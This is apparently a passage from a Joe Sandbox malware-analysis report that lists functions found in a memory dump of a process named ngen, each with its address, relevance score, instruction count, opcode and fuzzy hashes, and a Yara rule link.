                                                • Instruction ID: 1b0d50eb3b89d8c4b6d38746d5d2422ae05d22792c4df740139ab60032abfafc
                                                • Opcode Fuzzy Hash: 78fa8883e557bae077329b76e50eb5026d8e56bd1bff4a26dd1496b60a535f0f
                                                • Instruction Fuzzy Hash: FB41E7717443099BEB18FE699886FAA3A6AFB48714F01012EFE02DB351EBB59D00C751
                                                Function 0588D534 Relevance: .1, Instructions: 138COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 65acc356062c940c257adfc144e0f6acb97a341fdd194d66fe26878acafdfda1
                                                • Instruction ID: 0f692b52949256e178c67fc89707b535742856c507836c0688256ae9baf85696
                                                • Opcode Fuzzy Hash: 65acc356062c940c257adfc144e0f6acb97a341fdd194d66fe26878acafdfda1
                                                • Instruction Fuzzy Hash: A0518C327096958FC722DB18C444F7A73B6FB86754F0909A6FC06DB691EB34EC44CAA1
                                                Function 058B01F8 Relevance: .1, Instructions: 138COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a59bc54eec7f15446618f38a1b34881ae64cdeccbb932572b26914f1eda95f36
                                                • Instruction ID: 59831028423cbe6543e8cf60d9693297b7e7503da94de97666242e770cc8f0a9
                                                • Opcode Fuzzy Hash: a59bc54eec7f15446618f38a1b34881ae64cdeccbb932572b26914f1eda95f36
                                                • Instruction Fuzzy Hash: 2141DD35A00218DBEF15DF98C448AEEB7B9BF48604F14826AEC1AF7340D770AD45CBA5
                                                Function 058C2750 Relevance: .1, Instructions: 137COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                • Instruction ID: 3fc787db7337d1cffe5eaaf1c165a4f3120b75f2169b7b0a3b029d4789846bfd
                                                • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                • Instruction Fuzzy Hash: B7514C75A00619CFCB18CF58C580AADF7B6FF88724F2481A9D959E7750D730AE41CB90
                                                Function 058FD1C0 Relevance: .1, Instructions: 135COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                                • Instruction ID: b1e83ed351868c6b54a45e2d7f1c254a6737c1cc8faae162404e61d362bd8f39
                                                • Opcode Fuzzy Hash: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                                • Instruction Fuzzy Hash: BF511871A05205DFCB18CF68C481AADBBF1FB48314B14856EDA1AD7345E734EA80CF90
                                                Function 05886154 Relevance: .1, Instructions: 133COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8603a316bb9bd4feda6a088dd1ffd3c211b9b5c750c0f231febf3ae5f8ce54ba
                                                • Instruction ID: 4fd0b5d8daa493b7aa5f8c89702a29f27f435b469fcc94fa13fa4c5e7081ca94
                                                • Opcode Fuzzy Hash: 8603a316bb9bd4feda6a088dd1ffd3c211b9b5c750c0f231febf3ae5f8ce54ba
                                                • Instruction Fuzzy Hash: 8851C470A0461ADBDB25EB28C809BF8B7B2FF11314F1442E5D92AE72C1EB749D81CB41
                                                Function 0587B136 Relevance: .1, Instructions: 131COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b951443b9127b5a07fe9a6e79dd11710440488ebd971a43d8a5ed2ebd7311bdb
                                                • Instruction ID: 58acc9a01fc50575e150fac60d99266b7453c75f5ba629f719e1a3346614aed7
                                                • Opcode Fuzzy Hash: b951443b9127b5a07fe9a6e79dd11710440488ebd971a43d8a5ed2ebd7311bdb
                                                • Instruction Fuzzy Hash: 35417BB1651709AFDB22EF68C884B6ABBEAFF00694F044469ED55DB250E770DC00CB61
                                                Function 0594866E Relevance: .1, Instructions: 129COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                • Instruction ID: 302dd57e67799c1c5f9388c4d7565704a3bb5d9f63e0df696cea90b260d68c8e
                                                • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                • Instruction Fuzzy Hash: 9141B275B10205ABDF15DFA9CC94EBFBBBEBF89240F184069E801A7341DA70DD008BA0
                                                Function 058AA470 Relevance: .1, Instructions: 127COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: afb2e99ce57ac2c47bc5d17f06b11df60e8d4b1818810cc7cb20b3713bef14dc
                                                • Instruction ID: 7fdfbdae22071c7d1b75980755d98b8e9ba9447e713420a2537602f6672f2ee7
                                                • Opcode Fuzzy Hash: afb2e99ce57ac2c47bc5d17f06b11df60e8d4b1818810cc7cb20b3713bef14dc
                                                • Instruction Fuzzy Hash: 1E41BF32A49208CFEF19DFA8C8947A97BB5BB09314F140156E826EB691DB34DD40CBA4
                                                Function 058AD6E0 Relevance: .1, Instructions: 126COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c03573678a04a019ce9f05e32f7bda33c0dff209d57fada299d0f37c03ec99a7
                                                • Instruction ID: 22709090d8612a6bea335b6ea7b53e496ba4aa8ca75239910df9c27c83a9c482
                                                • Opcode Fuzzy Hash: c03573678a04a019ce9f05e32f7bda33c0dff209d57fada299d0f37c03ec99a7
                                                • Instruction Fuzzy Hash: D441B1762193049BD720EF28C994E6A7BB9FB85720F01456EFD16C7291DB30EC01CB92
                                                Function 0587A020 Relevance: .1, Instructions: 122COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                • Instruction ID: d9bb92c1910d0f932571674d8fc6787381d684aabb50edbb5c22efc6d4ca1fab
                                                • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                • Instruction Fuzzy Hash: C7411931B08219DBDB28DE598444BBEFBA2FB40756F16846AEC46DB240D631DD40DFA1
                                                Function 058B0710 Relevance: .1, Instructions: 121COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                • Instruction ID: 77e22617dc794e403b5a39541f46546d4d7f52235fc1d3698f11287402fdf60d
                                                • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                • Instruction Fuzzy Hash: E6411675A04705EFEB24CF98C984AAAB7F9FB08700B10496DE956DB390D770AE44CB94
                                                Function 0588262C Relevance: .1, Instructions: 119COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3ba416bd55b306cffd505a51d7765816edaffdbcf6997d07db223099c6059c5b
                                                • Instruction ID: c324894a08766b5f5f41c7ca904cc4db06ee4de12ffdeb625311c490a966fba8
                                                • Opcode Fuzzy Hash: 3ba416bd55b306cffd505a51d7765816edaffdbcf6997d07db223099c6059c5b
                                                • Instruction Fuzzy Hash: F4414875605B08DFCB25FF29C944A69B7F2FB84214F1482AAD917DB2A0EB309D41CB52
                                                Function 059007C3 Relevance: .1, Instructions: 114COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 146bfc974076ef5e81d586ed03940b56a3b7570a25f02e15d3b45794da1b64b5
                                                • Instruction ID: 4b23da6bf60db239f88d28c1094d90cb120cfbe3b1db4edb8478307038c843ac
                                                • Opcode Fuzzy Hash: 146bfc974076ef5e81d586ed03940b56a3b7570a25f02e15d3b45794da1b64b5
                                                • Instruction Fuzzy Hash: F44171716183049FD760DF28C849B9BBBE8FF88654F404A2EF998D7290DB74D904CB92
                                                Function 059005A7 Relevance: .1, Instructions: 111COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6876cc78266b85a8408f905529d4d466a35d8547c37e07a579ddf141693f1b7a
                                                • Instruction ID: 4651e63935aba0f060af1fa275c0b26ed9e146b8f379d48c13f30c38fb9e0e6c
                                                • Opcode Fuzzy Hash: 6876cc78266b85a8408f905529d4d466a35d8547c37e07a579ddf141693f1b7a
                                                • Instruction Fuzzy Hash: 2A41C0726087419FC320DF69C844BAAB7AAFFC8700F440A2DF895D7690E730E904C7A6
                                                Function 05885702 Relevance: .1, Instructions: 104COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1011fddb2f5c1c534248001fd76ec8898537ff32cda8b336f9682ca7fc2bf88e
                                                • Instruction ID: efa11f6b528ca1cb2ea8440a668b20f96123ecf3428e13f8824b83cbfdc1e02d
                                                • Opcode Fuzzy Hash: 1011fddb2f5c1c534248001fd76ec8898537ff32cda8b336f9682ca7fc2bf88e
                                                • Instruction Fuzzy Hash: 9F319C31301A16FBDB55BB64CA84EB9BBA6FF44718F409025ED02C7A50DBB4AC20CBD1
                                                Function 058A50E4 Relevance: .1, Instructions: 101COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                • Instruction ID: 44cb2f0b41479d3cb516deb5cab1b941dc439623771c1aba763a5c3356e8f6b9
                                                • Opcode Fuzzy Hash: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                • Instruction Fuzzy Hash: 0A31B4327083459BFF21EA18C800B77B6A6BB85754F49852AFC95CB295E674CC81C792
                                                Function 0587B480 Relevance: .1, Instructions: 100COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3f3698efff5bb64d2a0c2a7119ec1d34d7ad145a7a3c17f639b88669de05d2bb
                                                • Instruction ID: aa1c414e893a0cc65274d96aeef324ad85f718567c254a986b44914b4d50be0d
                                                • Opcode Fuzzy Hash: 3f3698efff5bb64d2a0c2a7119ec1d34d7ad145a7a3c17f639b88669de05d2bb
                                                • Instruction Fuzzy Hash: 5931F472604608AFC721DF18C840A6677A7FF85765F14426AFD45CB291EB31ED42CBD1
                                                Function 059461C3 Relevance: .1, Instructions: 97COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f4c53378244f9666c3deeba6c06f3eda548ba4b0cf4f3975cb9fbac973b7e462
                                                • Instruction ID: dc28f8ab89beef95b2ec64208ee58a1d49abdcc75702d11446de7202c368731a
                                                • Opcode Fuzzy Hash: f4c53378244f9666c3deeba6c06f3eda548ba4b0cf4f3975cb9fbac973b7e462
                                                • Instruction Fuzzy Hash: A231E1B6A0021ABBDB15DF98CC44FAEB7BAFB45B40F454168E900EB244D770ED40CBA0
                                                Function 05879730 Relevance: .1, Instructions: 96COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f5aa652ae914cdf120de8eac5da4ca859bd555e00ffeae1dcaa9662e11f4da39
                                                • Instruction ID: 48e2119fda3cd70d0692d13ad422a5eada004e3d798e5ab48da553f516028aa8
                                                • Opcode Fuzzy Hash: f5aa652ae914cdf120de8eac5da4ca859bd555e00ffeae1dcaa9662e11f4da39
                                                • Instruction Fuzzy Hash: CE21D076A04B1CABC7229F18C804B1ABBF5FB84B94F160469ED55DB350DB30EC00CB91
                                                Function 058807AF Relevance: .1, Instructions: 95COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1749f5ece76c9871bc2396d3fa9fc63c1ddbe795028c25788d08fc421848f649
                                                • Instruction ID: efaed334c277b11dd9b85f8d938dcf57ef0f5dabfbe1422560e94ae74b4a025b
                                                • Opcode Fuzzy Hash: 1749f5ece76c9871bc2396d3fa9fc63c1ddbe795028c25788d08fc421848f649
                                                • Instruction Fuzzy Hash: 1C319132B04719DBC712EE288C89E7BB7AAEF94754F014529EC55DB310DA30DC4997E2
                                                Function 059460B8 Relevance: .1, Instructions: 95COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2aeb17018ad7fa60a76cae938699d086accd05d8a156e9621f4c235e2045ee50
                                                • Instruction ID: fcd75af4617bad98d326e6a68ed8b0f2deae5d5eed657ab208b3e6fed2264c0c
                                                • Opcode Fuzzy Hash: 2aeb17018ad7fa60a76cae938699d086accd05d8a156e9621f4c235e2045ee50
                                                • Instruction Fuzzy Hash: AF31C2B1700605AFDF269F99C950E6EBBAAEF89754F04046AE509DB341DB30EC008F90
                                                Function 05888550 Relevance: .1, Instructions: 94COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7b9f6f9096ac5bac2cb52137c42172dd4c94c6e215059f0d481420af646af8df
                                                • Instruction ID: 9742e36aa42dcdd6c1afdda44e122cd32ddb08cd7d1b22526785e608604454db
                                                • Opcode Fuzzy Hash: 7b9f6f9096ac5bac2cb52137c42172dd4c94c6e215059f0d481420af646af8df
                                                • Instruction Fuzzy Hash: 083146766093018FE321DF19C940B2AB7E9FB88710F45496DEC86DB291D770EC48CB92
                                                Function 0587D6AA Relevance: .1, Instructions: 93COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                                • Instruction ID: 95af9328388e0a9b2181a1051ecb209347afc4538cf36d57b4b4ff81c4a25869
                                                • Opcode Fuzzy Hash: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                                • Instruction Fuzzy Hash: 9431957660620CAFDB21CE58C984F6EB3A9EF80794F1984A8ED16DB251D770DD40CBE1
                                                Function 058857C0 Relevance: .1, Instructions: 92COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 99ed2ba81b94446942b7c5382b81b35beefea4cea403e2edf27d4fa50def1793
                                                • Instruction ID: 7b20a2be951ce5b00d3a3b361edd17d61c2f3a53cff07cef2b06a7e61ef03afc
                                                • Opcode Fuzzy Hash: 99ed2ba81b94446942b7c5382b81b35beefea4cea403e2edf27d4fa50def1793
                                                • Instruction Fuzzy Hash: AF315835715A09FFDB55EB24CA88AAABBA6FF84314F545426EC01C7A50DB71EC30CB81
                                                Function 058BA6C7 Relevance: .1, Instructions: 92COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                • Instruction ID: 830eed18d3919c34279a9b511c1755dbc51ccf98994a4e219f4b8109225fdd3e
                                                • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                • Instruction Fuzzy Hash: 1F310C72B08701AFE764CF6ADD41B97B7F9BB08A50F14452DA99AC3750E670ED008B64
                                                Function 058D7190 Relevance: .1, Instructions: 89COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                                • Instruction ID: 5ab39514c9e0c54802240ec2ffdf51fdff87531a68bae2eef404407190178c19
                                                • Opcode Fuzzy Hash: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                                • Instruction Fuzzy Hash: F9316C75604206CFCB10CF18C480A56FBF6FF89314B2986A9E959DB315EB30ED06CBA1
                                                Function 058A438F Relevance: .1, Instructions: 89COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3f84dc34305631bf7242b2bba96310eb4d3c88decc6db70a326cf388039aaec0
                                                • Instruction ID: 2ffa163bb80b664131e637f3be263832707bdbcf7f0faa3e39bff7057577cf91
                                                • Opcode Fuzzy Hash: 3f84dc34305631bf7242b2bba96310eb4d3c88decc6db70a326cf388039aaec0
                                                • Instruction Fuzzy Hash: 7C31CF32B066059FEF25DFB8C985A6AB7FAAB80304F10842AD856D3264E770DD41CB91
                                                Function 0587E420 Relevance: .1, Instructions: 88COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8ea579d799ce435aed439ec952fd4bbfa11560d3dcfb9c046028a684cc4c4520
                                                • Instruction ID: 0e1bddb1c9f9b9f111321853b946a845f38503355ab3f1ae34da74d78970778e
                                                • Opcode Fuzzy Hash: 8ea579d799ce435aed439ec952fd4bbfa11560d3dcfb9c046028a684cc4c4520
                                                • Instruction Fuzzy Hash: AE31A232A01A2C9BDB35DA28CC41FEE77BEEB05744F0501E5EA45EB290D674DE808F91
                                                Function 0587C156 Relevance: .1, Instructions: 88COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 67404678517b3c3749f0cca0d062289809245603b91e5f77ff614f5baf339c8b
                                                • Instruction ID: 74e7de1cd0d2046659038e73a01ccbb59a5af6d7117f4c5cf0e2319d4dd0af9b
                                                • Opcode Fuzzy Hash: 67404678517b3c3749f0cca0d062289809245603b91e5f77ff614f5baf339c8b
                                                • Instruction Fuzzy Hash: 8431F6B66013009BCB20AF28C845B79BBB5BF81314F5481A9DC46DB342DA34DD86CBE0
                                                Function 058B4588 Relevance: .1, Instructions: 87COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                • Instruction ID: 20ef7c289f9031615a7994dda47edad6d3d217e68613c9d5265f61e69d36da11
                                                • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                • Instruction Fuzzy Hash: 0A216031A00608EBEF15CF58C985A9EBBAAFF49714F108069ED15DB352D6B1EE058B90
                                                Function 058B44B0 Relevance: .1, Instructions: 87COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6ad95dee2bebe8500c12cca954b445c2b9d5ebebbe8281dc8ed8ad4e8f0ca745
                                                • Instruction ID: 20512cc5d9f72c3a4ca1e66c67b8516dc43ccd09681fa2b974fffb15f7f99289
                                                • Opcode Fuzzy Hash: 6ad95dee2bebe8500c12cca954b445c2b9d5ebebbe8281dc8ed8ad4e8f0ca745
                                                • Instruction Fuzzy Hash: 6621A272608B459BDB21CE18C841BAB77EAFB88750F044519FD55DB351D7B0EE00CBA2
                                                Function 058FE609 Relevance: .1, Instructions: 86COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ac2ca911106948aa268886656216f20edc9964a19d2cf6d55316ab08b3c9aa94
                                                • Instruction ID: e06ca3245a87469e610dfe5823a9eea7c1b90e29cf8eb20aa02e2dbc7c066de2
                                                • Opcode Fuzzy Hash: ac2ca911106948aa268886656216f20edc9964a19d2cf6d55316ab08b3c9aa94
                                                • Instruction Fuzzy Hash: 37318D75600209EFCB54CF18C8849AEB7BAFF88304B11445AED0ADB3A0E735EE50CB95
                                                Function 0587E388 Relevance: .1, Instructions: 86COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                • Instruction ID: f1222f772ac424432bee10db65c0317b36f6434a406dbcb1cf6c17c388512577
                                                • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                • Instruction Fuzzy Hash: FB316B31600608EFD721DB68C888F6AB7F9FF85358F1445A9E952CB290E734EE01CB51
                                                Function 058BD530 Relevance: .1, Instructions: 85COMMON
                                                Download Yara Rule
